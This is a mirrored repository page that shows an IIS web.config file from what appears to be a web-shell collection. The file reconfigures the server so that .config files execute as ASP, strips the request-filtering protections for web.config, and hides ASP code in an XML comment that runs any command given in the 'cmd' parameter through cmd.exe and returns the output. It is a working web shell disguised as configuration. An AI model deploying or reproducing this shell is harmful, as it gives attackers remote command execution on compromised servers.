mirror of
https://github.com/tennc/webshell
synced 2024-11-12 22:47:15 +00:00
33 lines
1,003 B
Text
33 lines
1,003 B
Text
|
<?xml version="1.0" encoding="UTF-8"?>
|
||
|
<configuration>
|
||
|
<system.webServer>
|
||
|
<handlers accessPolicy="Read, Script, Write">
|
||
|
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||
|
</handlers>
|
||
|
<security>
|
||
|
<requestFiltering>
|
||
|
<fileExtensions>
|
||
|
<remove fileExtension=".config" />
|
||
|
</fileExtensions>
|
||
|
<hiddenSegments>
|
||
|
<remove segment="web.config" />
|
||
|
</hiddenSegments>
|
||
|
</requestFiltering>
|
||
|
</security>
|
||
|
</system.webServer>
|
||
|
</configuration>
|
||
|
<!--
|
||
|
<%
|
||
|
Response.Write("-"&"->")
|
||
|
|
||
|
Function GetCommandOutput(command)
|
||
|
Set shell = CreateObject("WScript.Shell")
|
||
|
Set exec = shell.Exec(command)
|
||
|
GetCommandOutput = exec.StdOut.ReadAll
|
||
|
End Function
|
||
|
|
||
|
Response.Write(GetCommandOutput("cmd /c " + Request("cmd")))
|
||
|
Response.Write("<!-"&"-")
|
||
|
%>
|
||
|
-->
|